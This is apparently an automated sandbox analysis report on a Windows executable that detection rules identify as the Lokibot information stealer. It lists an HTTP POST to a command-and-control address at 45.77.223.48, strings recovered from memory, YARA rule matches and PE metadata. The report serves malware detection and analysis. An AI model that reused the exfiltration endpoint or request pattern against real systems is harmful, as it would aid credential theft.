                      Source: unknownHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 176Connection: close
                      Source: SCB#89940578.exe, 00000002.00000002.2812221693.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2811909354.00000000004A0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://45.77.223.48/~blog/?ajax=posts.php
                      Source: SCB#89940578.exe, 00000002.00000002.2812221693.0000000000BE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.77.223.48/~blog/?ajax=posts.phpJ
                      Source: SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.77.223.48/~blog/?feed=comments-rss2
                      Source: SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.77.223.48/~blog/?feed=rss2
                      Source: SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.77.223.48/~blog/index.php?rest_route=/
                      Source: SCB#89940578.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: SCB#89940578.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                      Source: SCB#89940578.exeString found in binary or memory: http://ocsp.comodoca.com0
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: SCB#89940578.exe, SCB#89940578.exe, 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: SCB#89940578.exe, 00000000.00000002.1708357533.00000000054E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comJ
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
                      Source: SCB#89940578.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                      System Summary

                      barindex
                      Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                      Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: Process Memory Space: SCB#89940578.exe PID: 7112, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: Process Memory Space: SCB#89940578.exe PID: 7272, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_0298D2A40_2_0298D2A4
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_04F38D080_2_04F38D08
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_04F300400_2_04F30040
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_04F38CF90_2_04F38CF9
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_073723E00_2_073723E0
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_073720C80_2_073720C8
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_073716880_2_07371688
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_073714500_2_07371450
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_073714410_2_07371441
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_073723D10_2_073723D1
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_0737F3C80_2_0737F3C8
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_073702280_2_07370228
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_073702190_2_07370219
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_0737D2B80_2_0737D2B8
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_0737D2A90_2_0737D2A9
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_073700060_2_07370006
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_073730700_2_07373070
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_073730600_2_07373060
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_073720B80_2_073720B8
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_073710E00_2_073710E0
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_073710D10_2_073710D1
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_07375F700_2_07375F70
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_07375F610_2_07375F61
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_0737EF900_2_0737EF90
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_0737EF820_2_0737EF82
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_0737CE800_2_0737CE80
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_0737CA480_2_0737CA48
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_073749100_2_07374910
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 0_2_0737490E0_2_0737490E
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 2_2_0040549C2_2_0040549C
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 2_2_004029D42_2_004029D4
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: String function: 0041219C appears 45 times
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: String function: 00405B6F appears 42 times
                      Source: SCB#89940578.exeStatic PE information: invalid certificate
                      Source: SCB#89940578.exe, 00000000.00000002.1709695361.0000000009FD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SCB#89940578.exe
                      Source: SCB#89940578.exe, 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SCB#89940578.exe
                      Source: SCB#89940578.exe, 00000000.00000002.1705262082.0000000000DDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SCB#89940578.exe
                      Source: SCB#89940578.exeBinary or memory string: OriginalFilenameHCJ.exeX vs SCB#89940578.exe
                      Source: SCB#89940578.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
